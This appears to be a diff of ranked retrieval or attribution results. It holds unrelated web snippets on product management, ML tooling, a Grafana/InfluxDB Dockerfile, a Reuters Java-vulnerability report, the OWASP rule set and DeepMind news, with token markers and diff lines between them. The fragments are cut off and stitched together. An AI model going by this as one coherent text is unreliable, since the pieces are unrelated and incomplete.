with a person you like but who also helps you process fast. In product Management, more than any other profession, the soft skills are extremely important. - -Imagine also receiving a request from a client for a feature that you would describe as obvious. You may have to explore your empathy since recognizing that not everyone interprets things the same way. - -So What’s Emotional Intelligence? - -Emotional Intelligence is the ability to identify and manage your own emotions and the emotions of others. It is generally said to include three skills: emotional awareness; the ability to harness emotions and apply them to tasks like thinking and problem solving; and the ability to manage emotions, which includes regulating your own emotions and cheering up or calming down other people. (Source) - -So, Emotional Intelligence (EQ or EI) in a nutshell is defined as the ability to - -Recognize, understand and manage our own emotions - -Recognize, understand and influence the emotions of others - -How to leverage your Emotional intelligence for Product Management? - -Here are 8 Tips that we gathered from Vivek Bed -================================================================================ -Rank = 28; Score = 4915200.0 -<|begin_of_text|>By Ben Lorica - -For companies in the early stages of grappling with big data, the analytic lifecycle (model building, deployment, maintenance) can be daunting. In earlier posts I highlighted some new tools that simplify aspects of the analytic lifecycle, including the early phases of model building. But while tools are allowing companies to offload routine analytic tasks to business analysts, experienced modelers are still needed to fine-tune and optimize, mission-critical algorithms. - -Model Selection: Accuracy and other considerations - -Accuracy1 is the main objective and a lot of effort goes towards raising it. But in practice tradeoffs have to be made, and other considerations play a role in model selection. Speed (to train/score) is important if the model is to be used in production. Interpretability is critical if a model has to be explained for transparency2 reasons (“black-boxes” are always an option, but are opaque by definition). Simplicity is important for practical reasons: if a model has “too many knobs to tune” and optimizations have to be done manually, it might be too involved to build and maintain it in production3. - -Chances are a model that’s fast, easy to explain (interpretable), and easy to tune (simple), is less4 accurate. Experienced model builders are valuable precisely because they’ve weighed these tradeoffs across many domains and settings. Unfortunately not many companies have the experts that can identify, build, deploy, and maintain models at scale. (An example from Google illustrates the kinds of issues that can come up.) - -Fast and/or scalable - -scikit-learn is a popular, well-documented package with models that leverage IPython’s distributed computing features. Over time MLbase will include an optimizer that simplifies model selection for a variety of machine-learning tasks. Depending on their performance requirements, scikit-learn and MLbase users may still need to recode models to speed them up for production. Solutions like VW, H20, and wise.io give users access to fast and scalable implementations of a few algorithms: in the case of wise.io, the company focuses only on Random Forest. Statistics software vendors like Revolution Analytics, SAS, and SPSS have been introducing scalable algorithms and tools for managing the analytic lifecycle. - -The creators of a popular open source, machine-learning project recently launched a startup, focused on building commercial-grade options and tools. GraphLab provides fast toolkits for a range of problems including collaborative filtering, clustering, text mining (topic models), and graph analytics. Having had a chance to play with an early version -================================================================================ -Rank = 29; Score = 4849664.0 +Rank = 29; Score = 2785280.0 <|begin_of_text|>OctaEdit has been built in a modular fashion, where each module can be used for various tasks, and each module can interact with the other modules in various ways. OctaEdit has eleven (11) Modules: Project, Samples, Sequencer, Manager, Chainer, Arp Designer, LFO Designer, Library, Analytics, Options and Support. @@ -731,105 +699,133 @@ The Arp Designer Module. The Arp Designer module provides the ability to graphically design arpeggios ================================================================================ -Rank = 30; Score = 4718592.0 -<|begin_of_text|>Three Challenges for Artificial Intelligence in Medicine +Rank = 30; Score = 2752512.0 +<|begin_of_text|>InfluxDB : InfluxDB is an open-source time series database written in Go that has been built to work best with metrics, events, and analytics. Using InfluxDB, you can easily store system and application performance data and manage any time series data. -Brandon Ballinger Blocked Unblock Follow Following Sep 19, 2016 +Grafana : Grafana is an open-source, general purpose dashboard that is used for visualizing time series data for Internet infrastructure and application analytics. Grafana supports graphite, influxdb or opentsdb as backends and runs as a web application. -Why is the world’s most advanced AI used for cat videos, but not to help us live longer and healthier lives? A brief history of AI in Medicine, and the factors that may help it succeed where it has failed before. +In this tutorial, we will learn how to create and run Grafana and InfluxDB Docker containers in Ubuntu 14.04. -Imagine yourself as a young graduate student in Stanford’s Artificial Intelligence lab, building a system to diagnose a common infectious disease. After years of sweat and toil, the day comes for the test: a head-to-head comparison with five of the top human experts in infectious disease. Over the first expert, your system squeezes a narrow victory, winning by just 4%. It beats the second, third, and fourth doctors handily. Against the fifth, it wins by an astounding 52%. +Requirements -Would you believe such a system exists already? Would you believe it existed in 1979? This was the MYCIN project, and in spite of the excellent research results, it never made its way into clinical practice. [1] +A server running Ubuntu-14.04 with Docker installed. -In fact, although we’re surrounded by fantastic applications of modern AI, particularly deep learning — self-driving cars, Siri, AlphaGo, Google Translate, computer vision — the effect on medicine has been nearly nonexistent. In the top cardiology journal, Circulation, the term “deep learning” appears only twice [2]. Deep learning has never been mentioned in the New England Journal of Medicine, The Lancet, BMJ, or even JAMA, where the work on MYCIN was published 37 years ago. What happened? +A non-root user with sudo privileges setup on server. -There are three central challenges that have plagued past efforts to use artificial intelligence in medicine: the label problem, the deployment problem, and fear around regulation. Before we get in to those, let’s take a quick look at the state of medicine today. +Creating The Dockerfile -The Moral Case for AI in Healthcare +First, you will need to create the Docker file to install all requisite software. Create docker file inside your home directory using the following command: -Medicine is life and death. With such high stakes, one could ask: should we really be rocking the boat here? Why not just stick with existing, proven, clinical-grade algorithms? +sudo nano Dockerfile -Well, consider a few examples of the status quo: +Add the following lines with all requisite software: -The most common prediction model for stroke risk was based on only 25 strokes. Source: Lip 2010 +FROM ubuntu MAINTAINER Hitesh Jethva (hitjethva@gmail.com) RUN apt-get update && apt-get -y --no-install-recommends install ca-certificates software-properties-common python-django-tagging python-simplejson python-memcache python-ldap python-cairo python-pysqlite2 python-support python-pip gunicorn supervisor nginx-light nodejs git curl openjdk-7-jre build-essential python-dev -To be clear, none of this means medical researchers are doing a bad job. Modern medicine is a miracle; it’s just unevenly-distributed. Computer scientists can bring much to the table here. With tools like Apple’s ResearchKit and Google Fit, we can collect health data at scale -================================================================================ -Rank = 31; Score = 4554752.0 -<|begin_of_text|>Researchers at the University of Liverpool have developed a set of algorithms that will help teach computers to process and understand human languages. +Add the following lines to install Grafana, InfluxDB, and do some basic configuration: -Whilst mastering natural language is easy for humans, it is something that computers have not yet been able to achieve. Humans understand language through a variety of ways for example this might be through looking up it in a dictionary, or by associating it with words in the same sentence in a meaningful way. +WORKDIR /opt RUN curl -s -o /opt/grafana-1.8.1.tar.gz http://grafanarel.s3.amazonaws.com/grafana-1.8.1.tar.gz && curl -s -o /opt/influxdb_latest_amd64.deb http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb && mkdir /opt/grafana && tar -xzvf grafana-1.8.1.tar.gz --directory /opt/grafana --strip-components=1 && dpkg -i influxdb_latest_amd64.deb && echo "influxdb soft nofile unlimited" >> /etc/security/limits.conf && echo "influxdb hard nofile unlimited" >> /etc/security/limits.conf -The algorithms will enable a computer to act in much the same way as a human would when encountered with an unknown word. When the computer encounters a word it doesn’t recognise or understand, the algorithms mean it will look up the word in a dictionary (such as the WordNet), and tries to guess what other words should appear with this unknown word in the text. +Next, copy some configuration files: -Semantic representation +ADD config.js /opt/grafana/config.js ADD nginx.conf /etc/nginx/nginx.conf ADD supervisord.conf /etc/supervisor/conf.d/superv +================================================================================ +Rank = 31; Score = 2736128.0 +<|begin_of_text|>* Dept of Homeland Security: Java vulnerable to hackers -It gives the computer a semantic representation for a word that is both consistent with the dictionary as well as with the context in which it appears in the text. In order to know whether the algorithm has provided the computer with an accurate representation of a word it compares similarity scores produced using the word representations learnt by the computer algorithm against human rated similarities. +* Could be used to steal identity, form malicious networks -Liverpool computer scientist, Dr Danushka Bollegala, said: “Learning accurate word representations is the first step towards teaching languages to computers.” +* Applies to browsers on all major operating systems -“If we can represent the meaning for a word in a way a computer could understand, then the computer will be able to read texts on behalf of humans and perform potentially useful tasks such as translating a text written in a foreign language, summarising a lengthy article, or find similar other documents from the Internet. +By Jim Finkle -“We are excitingly waiting to see the immense possibilities that will be brought about when such accurate semantic representations are used in various language processing tasks by the computers.” +Jan 11 (Reuters) - The U.S. Department of Homeland Security urged computer users to disable Oracle Corp’s Java software, amplifying security experts’ prior warnings to the hundreds of millions of consumers and businesses that use it to surf the Web. -The research was presented at the Association for Advancement of Artificial Intelligence Conference (AAAI-2016) held in Arizona, USA.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 32; Score = 4456448.0 -<|begin_of_text|>OWASP ModSecurity Core Rule Set (CRS) +Hackers have figured out a way to exploit Java to install malicious software enabling them to commit crimes ranging from identity theft to making an infected computer part of an ad-hoc network of computers that can be used to attack websites. -The 1st Line of Defense Against Web Application Attacks +“We are currently unaware of a practical solution to this problem,” the Department of Homeland Security’s Computer Emergency Readiness Team said in a posting on its website late on Thursday. -The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. The CRS provides protection against many common attack categories, including SQL Injection, Cross Site Scripting, Locale File Inclusion, etc. The offical website of the project can be found at https://coreruleset.org. +“This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered,” the agency said. “To defend against this and future Java vulnerabilities, disable Java in Web browsers.” -Getting Started / Tutorials +Java is a computer language that enables programmers to write software utilizing just one set of code that will run on virtually any type of computer, including ones that use Microsoft Corp’s Windows, Apple Inc’s OS X and Linux, an operating system widely employed by corporations. -The following tutorials will get you started with ModSecurity and the CRS v3. +Computer users access Java programs through modules, or plug-ins, that run Java software on top of browsers such as Internet Explorer and Firefox. -These tutorials are part of a big series of Apache / ModSecurity guides published by netnea. They are written by Christian Folini. +The U.S. government’s warning on Java came after security experts earlier on Thursday warned of the newly discovered flaw. -More Information about the rule set is available at the official website, https://coreruleset.org. - -Licensing +It is relatively rare for government agencies to advise computer users to completely disable software due to a security bug, particularly in the case of widely used programs such as Java. They typically recommend taking steps to mitigate the risk of attack while manufacturers prepare an update, or hold off on publicizing the problem until an update is prepared. -OWASP ModSecurity CRS is free to use. It is licensed under the Apache Software License version 2 (ASLv2), so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. +In September, the German government advised the public to temporarily stop using Microsoft’s Internet Explorer browser to give it time to patch a security vulnerability that opened it to attacks. -Reporting Issues +The Department of Homeland Security said that attackers could trick targets into visiting malicious websites that would infect their PCs with software capable of exploiting the bug in Java. -If you think you've found a false positive in commercially available software and want us to take a look, submit an issue on our Github +It said that an attacker could also infect a legitimate website by uploading malicious software that would infect machines of computer users who trust that site because they have previously visited it without experiencing any problems. -Have you found a false negative/bypass? We'd love to hear about it - please responsibly disclose it to security@coreruleset.org<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +They said developers of several popular tools known as exploit kits, which criminal hackers use to attack PCs, have added software that allows hackers to exploit the newly discovered bug in Java to attack ================================================================================ -Rank = 33; Score = 4423680.0 -<|begin_of_text|>DeepMind +Rank = 32; Score = 2686976.0 +<|begin_of_text|>Just a few years ago the common perception was that we were in an AI winter. -When DeepMind burst into prominent view in 2014 it taught its machine learning systems how to play Atari games. The system could learn to defeat the games, and score higher than humans, but not remember how it had done so. +Although there were lots of narrow AI applications running in the background of our daily lives, there wasn’t much enthusiasm. -DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose DeepMind DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose +But quietly in the background, a revolution was building thanks to progress across a few key areas. These areas would soon converge to produce breakthrough after breakthrough and put us on the verge of what many believe to be the most important event in human history. -Advertisement +Key Advance 1) More Data -For each of the Atari games, a separate neural network had to be created. The same system could not be used to play Space Invaders and Breakout without the information for both being given to the artificial intelligence at the same time. Now, a team of DeepMind and Imperial College London researchers have created an algorithm that allows its neural networks to learn, retain the information, and use it again. +Andrew Ng of Baidu explains that a massive amount of data is needed. If you put 10x the data in many of these algorithms they work, put 1/10th in and they don’t. -"Previously, we had a system that could learn to play any game, but it could only learn to play one game," James Kirkpatrick, a research scientist at DeepMind and the lead author of its new research paper, tells WIRED. "Here we are demonstrating a system that can learn to play several games one after the other". +Previously it was very difficult to get hold of the massive amounts of data required to feed the AI systems, but thanks to the internet researchers have tonnes of data to train their neural nets. -Read next DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass +Key Advance 2) More Computing Power -The work, published in the Proceedings of the National Academy of Sciences journal, explains how DeepMind's AI can learn in sequences using supervised learning and reinforcement learning tests. This is also explained in a blog post from the company. +If you only have the computational power to build a small neural network it doesn’t work. But computer power has continued to increase and prices have dropped. -Watch Google's Deep Mind complete Montezuma's Revenge Gaming Watch Google's Deep Mind complete Montezuma's Revenge +Moore’s Law may be stalling, but the Law of Accelerating Returns is not. -Advertisement +The Law of Accelerating Returns. What Steve Jurvetson calls “the most important graph ever”. -"The ability to learn tasks in succession without forgetting is a core component of biological and artificial intelligence," the computer scientists write in the paper. Kirkpatrick says a "significant shortcoming" in neural networks and artificial intelligence has been its inability to transfer what it has learned from one task to the next. +GPUs are much better for training neural networks than CPUs and have provided the computer power needed for these algorithms to function. -The group says it has been able to show "continual learning" that's based on'synaptic consolidation'. In the human brain, the process is described as "the basis of learning and memory". +Infrastructure has also improved. Today it’s possible for anyone to rent a massive amount of GPU power on cloud computing platforms (AWS, Microsoft Azure, Google Cloud, IBM Cloud). -The performance of DeepMind's EWC algorithm 'enhanced' neural network compared to its other nets DeepMind / PNAS +Key Advance 3) Better Algorithms -Read next DeepMind's latest AI breakthrough is its most significant yet DeepMind's latest AI breakthrough is its most significant yet +Neural networks have been known about for decades, but most researchers had given up on them + +Geoffrey Hinton of Google is one of the few who stuck with it. Despite his peers calling it a dead end, he believed that it was the right approach. It turned out he was right. + +Hinton learned how to stack neural networks dozens of layers deep (deep learning) which enabled vastly more calculations and now he is considered “the godfather of neural networks”. + +With these 3 breakthroughs in place neural networks finally began to work. And they worked better than almost anyone expected. + +The Tipping Point: ImageNet 2012 + +The ImageNet project was created in 2009 to judge how well computers can see. + +In 2011 computers had a 26% error rate when trying to label images. Humans only had a 5% error rate. + +But in 2012, Hinton’s team made a breakthrough +================================================================================ +Rank = 33; Score = 2654208.0 +<|begin_of_text|>A cinematographer is also known as a director of photography. They’re the guys that make the movies we watch look how they look. It’s their photographic eye that we see. And they don’t get too much recognition for the work they do, with most of the attention going towards the director and actor already. I wanted to write about a few good ones and see if it can become a weekly thing if you guys are into it. You probably know the work these guys have done, so I’ll cover what they did to get the shots that we see on the big screen. + +If this is going to be the first out of more to come, I’ll start it off with a bang by focusing it on Roger Deakins. + +Roger Deakins + +You’d probably have called him a purist; Roger Deakins’ preferred medium was film, until around 2011, when he stepped into the digital world when the Alexa cameras caught his eye. + +“I prefer Super 35 because it allows you to use short focal-length lenses. I also like the scale of that format — the intimacy — and the texture of the film grain. In some cases I find anamorphic to be almost too clean, too grain-free and pristine.” (AC Magazine, October 2007) + +Regardless of what he uses, he uses it to its fullest potential. If you’ve seen The Shawnshank Redemption, No Country for Old Men, The Assassination of Jesse James, Skyfall or even How to Train Your Dragon, you’ve seen his work. The guy’s got a resume, and it’s a wonder that none of his work has placed him an oscar yet. Here’s how a few of his most iconic shots were done: + +The Assassination of Jesse James by the Coward Robert Ford + +The Assassination of Jesse James opens with a train robbery. This scene was being filmed entirely at night, in a town called Edmonton. The train they had was supposedly a bit small (the director started calling it Thomas the Tank Engine), and they didn’t have the budget to bring a bigger train. Deakins assured the crew that with the right camera work, it wouldn’t be a big deal at all. After attempting to calm the crew down, Deakins gave the set another scare with his approach to how he’d film the scene: with just one source of light coming from a lamp set on the train. + +Considering this was being done with a night shot, everyone was rightfully pretty uneasy; what resulted, however, was possibly ================================================================================ -Rank = 34; Score = 4292608.0 +Rank = 34; Score = 2637824.0 <|begin_of_text|>It’s been a while we haven’t covered any machine learning algorithm. Last time we discussed the Markov Decision Process (or MDP). Today we’re going to build our knowledge on top of the MDP and see how we can generalise our MDP to solve more complex problems. @@ -854,7 +850,36 @@ Doesn’t it sound familiar? Indeed, it looks quite similar to our tiny robot ex The robot (the agent) moves (take actions) and gets a reward as it moves closer to ================================================================================ -Rank = 35; Score = 4227072.0 +Rank = 35; Score = 2605056.0 +<|begin_of_text|>DeepMind + +When DeepMind burst into prominent view in 2014 it taught its machine learning systems how to play Atari games. The system could learn to defeat the games, and score higher than humans, but not remember how it had done so. + +DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose DeepMind DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose + +Advertisement + +For each of the Atari games, a separate neural network had to be created. The same system could not be used to play Space Invaders and Breakout without the information for both being given to the artificial intelligence at the same time. Now, a team of DeepMind and Imperial College London researchers have created an algorithm that allows its neural networks to learn, retain the information, and use it again. + +"Previously, we had a system that could learn to play any game, but it could only learn to play one game," James Kirkpatrick, a research scientist at DeepMind and the lead author of its new research paper, tells WIRED. "Here we are demonstrating a system that can learn to play several games one after the other". + +Read next DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass + +The work, published in the Proceedings of the National Academy of Sciences journal, explains how DeepMind's AI can learn in sequences using supervised learning and reinforcement learning tests. This is also explained in a blog post from the company. + +Watch Google's Deep Mind complete Montezuma's Revenge Gaming Watch Google's Deep Mind complete Montezuma's Revenge + +Advertisement + +"The ability to learn tasks in succession without forgetting is a core component of biological and artificial intelligence," the computer scientists write in the paper. Kirkpatrick says a "significant shortcoming" in neural networks and artificial intelligence has been its inability to transfer what it has learned from one task to the next. + +The group says it has been able to show "continual learning" that's based on'synaptic consolidation'. In the human brain, the process is described as "the basis of learning and memory". + +The performance of DeepMind's EWC algorithm 'enhanced' neural network compared to its other nets DeepMind / PNAS + +Read next DeepMind's latest AI breakthrough is its most significant yet DeepMind's latest AI breakthrough is its most significant yet +================================================================================ +Rank = 36; Score = 2539520.0 <|begin_of_text|>Image copyright Reuters Image caption Chinese Go player Ke Jie has lost two games to AlphaGo Google's DeepMind AlphaGo artificial intelligence has defeated the world's number one Go player Ke Jie. @@ -893,119 +918,69 @@ Both experts agreed that such algorithms could be adapted to other fields, such DeepMind has already begun working with the UK's national health service to develop apps and other tools for diagnosis.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 36; Score = 4194304.0 -<|begin_of_text|>Let be a natural number. A basic operation in the topology of oriented, connected, compact, -dimensional manifolds (hereby referred to simply as manifolds for short) is that of connected sum: given two manifolds, the connected sum is formed by removing a small ball from each manifold and then gluing the boundary together (in the orientation-preserving manner). This gives another oriented, connected, compact manifold, and the exact nature of the balls removed and their gluing is not relevant for topological purposes (any two such procedures give homeomorphic manifolds). It is easy to see that this operation is associative and commutative up to homeomorphism, thus and, where we use to denote the assertion that is homeomorphic to. - -(It is important that the orientation is preserved; if, for instance,, and is a chiral 3-manifold which is chiral (thus, where is the orientation reversal of ), then the connect sum of with itself is also chiral (by the prime decomposition; in fact one does not even need the irreducibility hypothesis for this claim), but is not. A typical example of an irreducible chiral manifold is the complement of a trefoil knot. Thanks to Danny Calegari for this example.) - -The -dimensional sphere is an identity (up to homeomorphism) of connect sum: for any. A basic result in the subject is that the sphere is itself irreducible: - -Theorem 1 (Irreducibility of the sphere) If, then. +Rank = 37; Score = 2457600.0 +<|begin_of_text|>OWASP ModSecurity Core Rule Set (CRS) -For (curves), this theorem is trivial because the only connected -manifolds are homeomorphic to circles. For (surfaces), the theorem is also easy by considering the genus of. For the result follows from the prime decomposition. But for higher, these ad hoc methods no longer work. Nevertheless, there is an elegant proof of Theorem 1, due to Mazur, and known as Mazur’s swindle. The reason for this name should become clear when one sees the proof, which I reproduce below. +The 1st Line of Defense Against Web Application Attacks -Suppose. Now consider the infinite connected sum +The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. The CRS provides protection against many common attack categories, including SQL Injection, Cross Site Scripting, Locale File Inclusion, etc. The offical website of the project can be found at https://coreruleset.org. -This is an infinite connected sum of spheres, and can thus be viewed as a half-open cylinder, which is topologically equivalent to a sphere with a small ball removed; alternatively, one can contract the boundary at infinity to a point to recover the sphere. On the other hand, by using the associativity of connected sum (which will still work for the infinite connected sum, if one thinks about it carefully -================================================================================ -Rank = 37; Score = 4194304.0 -<|begin_of_text|>Energy lab team explores new ways of analyzing social media +Getting Started / Tutorials -A team at the Energy Department’s Pacific Northwest National Laboratory is creating an analysis tool that makes spotting trends in social media faster and easier. +The following tutorials will get you started with ModSecurity and the CRS v3. -The tool, called SALSA, for SociAL Sensor Analytics, takes an automated approach that can sort through billions of tweets or other posts in seconds, identifying patterns and finding key bits of information that could be useful in emergency response, public health and other areas, according to PNNL. +These tutorials are part of a big series of Apache / ModSecurity guides published by netnea. They are written by Christian Folini. -SALSA draws on the computing power of PNNL’s 600-node, 162-Teraflop Olympus supercomputing cluster, so the processing power is there. The challenge was finding a way to dig useful information out from all the banter on a platform that also has a non-traditional lexicon. +More Information about the rule set is available at the official website, https://coreruleset.org. -“The task we all face is separating out the trivia, the useless information we all are blasted with every day, from the really good stuff that helps us live better lives,” Court Corley, a PNNL data scientist who’s leading the research, said in PNNL’s report. “There's a lot of noise, but there's some very valuable information too." +Licensing -Corley said the reach of social media creates value in analyzing posts to various platforms. "The world is equipped with human sensors — more than 7 billion and counting,” he said. “It's by far the most extensive sensor network on the planet. What can we learn by paying attention?" +OWASP ModSecurity CRS is free to use. It is licensed under the Apache Software License version 2 (ASLv2), so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. -Agencies have employed systems to monitor social media, such as the U.S. Geological Survey’s Twitter Earthquake Detector (TED). The system was created in 2009 because Twitter often spreads the word about earthquakes and other disasters faster than traditional sensor methods. But one reason TED works is that USGS taps into Twitter’s API to search for a known keyword — “earthquake.” Taking a deeper dive into analyzing social media is more of a challenge. +Reporting Issues -The Library of Congress has run into that difficulty with its Twitter archive. LOC has collected hundreds of billions of tweets for use in research, but found that available tools for sifting through the archive are inadequate. Searches take too much time (just searching the 20 billion tweets in its initial collection would take 24 hours), and as a result LOC was turning down requests from researchers to explore the archive. +If you think you've found a false positive in commercially available software and want us to take a look, submit an issue on our Github -And the amount of social media-generated data is only going to grow. PNNL points out that, as of mid-2012, information posted to social media outlets each hour included an average of 30 million comments, +Have you found a false negative/bypass? We'd love to hear about it - please responsibly disclose it to security@coreruleset.org<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 38; Score = 4079616.0 -<|begin_of_text|>InfluxDB : InfluxDB is an open-source time series database written in Go that has been built to work best with metrics, events, 